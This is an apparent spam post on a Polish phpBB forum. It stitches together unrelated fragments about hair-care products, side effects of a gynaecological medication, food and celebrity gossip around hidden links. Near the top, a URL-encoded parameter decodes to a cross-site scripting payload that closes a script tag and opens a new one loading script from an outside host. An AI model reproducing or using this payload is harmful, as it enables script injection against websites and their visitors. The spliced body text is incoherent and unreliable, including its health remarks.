Forum www.13zsp.fora.pl Strona Główna www.13zsp.fora.pl
forum grupowe
 
 FAQFAQ   SzukajSzukaj   UżytkownicyUżytkownicy   GrupyGrupy   GalerieGalerie   RejestracjaRejestracja 
 ProfilProfil   Zaloguj się, by sprawdzić wiadomościZaloguj się, by sprawdzić wiadomości   ZalogujZaloguj 

Naprawdę się cieszę, że się człowiek oczyści, przesta

 
Napisz nowy temat   Odpowiedz do tematu    Forum www.13zsp.fora.pl Strona Główna -> Hyde Park
Zobacz poprzedni temat :: Zobacz następny temat  
Autor Wiadomość
Juukla




Dołączył: 24 Sty 2014
Posty: 731
Przeczytał: 0 tematów

Ostrzeżeń: 0/5
Skąd: Finland

PostWysłany: Nie 3:06, 23 Mar 2014    Temat postu: Naprawdę się cieszę, Ĺźe się człowiek oczyści, przesta

[link widoczny dla zalogowanych] p?transaction=%2F%2F%2D%2D%3E%22%3E%3C%2F%73%63%72%69%70%74% 3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3 [link widoczny dla zalogowanych] Hej everybody!
[link widoczny dla zalogowanych]
Moje włosy to coś w stylu :
Jajko - 1g wegli
Czesc dziewczyny!
[link widoczny dla zalogowanych]

Przy zimnej pogodzie np ja przeprowadzała we wrześniu ale w trakcie trwania było bardzo zimno i deszczowo . [link widoczny dla zalogowanych] Podczas brania betadine była okej, ale od kąd biorę gynaglin czuję dyskomfort w dole brzucha tak po bokach, dość nieprzyjemne, wzięłam już siedem i mam ochotę wyrzucić w cholerę te trzy ostatnie.

170!!!!!!!!!! Jestem prostym wsiokiem.Niestety. ubierz sie bo ja musze sie wysmiac i wyszla na korytarz... A nasz Patulek to zaraz urodzi Naprawde chcialbym wiedziec jaki jest tego tytul . [link widoczny dla zalogowanych]
bigos z wołowiną, kolega z Indii, to nowy smak pozna i rzeczywiście przyszłam na farbę-tym razem zajmowała się mna druga Pani Kasia bo byl to sezon urlopowy i obie Panie spisały się na medal. Spalanie tłuszczu brzusznego w czasie intensywnego stresu: Pozdrawiam i życzę zdrowia. moze i to nie bylo madre ale żyję Ja nie moge przeżyć dla bez odzywek bez spłukiwania, ktore ratują moje wlosy przed puszeniem.Najlepsze eferty dawało u mnie mleczko Sunsilk jednak wycofali cała linie z produkcji,odzywka z nafta kosmetyczna bez spłukiwania- jak dla mnie koszmar.Balsam Nivea- strata pieniędzy brzydko pachnie jak dla mnie i skleja włosy.Pianki wysuszają włosy więc odstawiłam je definitywnie chyba ze na jakieś wieksze wyjście czy na dicho dla utrwalenia.Lakierów też 0 gdyż jestem zbyt leniwa żeby myć moje włosy codziennie a po nim niestety zachodziła zawsze taka potrzeba.Jedwab akurat na mnie nie działa.Hmm...w sumie mało jest dobrych kosmetyków do kreconych włosów.Obecnie wróciłam do odzywki Pantine fale i loki i w miare jest dobra, nie ma siana na głowie.Z Racji intensywnej regeneracji używam jeszcze raz na tydzien maski z apteki WAX któa jest dla mnie rewelacyjna ale o niej jest dużo na necie ...możecie poczytac Piszesz ze wie to kazde dziecko lecz jak mozna zauwazyc na forum wielu doroslych o tym nie wie.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]
Mogło sie komuś pomylić z Apple, czyli slodkim Jabłuszkiem Gwyneth.
[link widoczny dla zalogowanych]
[link widoczny dla zalogowanych]


Post został pochwalony 0 razy
Powrót do góry
Zobacz profil autora  
Wyświetl posty z ostatnich:   
Napisz nowy temat   Odpowiedz do tematu    Forum www.13zsp.fora.pl Strona Główna -> Hyde Park Wszystkie czasy w strefie EET (Europa)
Strona 1 z 1

 
Skocz do:  
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach

fora.pl - załóż własne forum dyskusyjne za darmo
Powered by phpBB © 2001, 2005 phpBB Group
Regulamin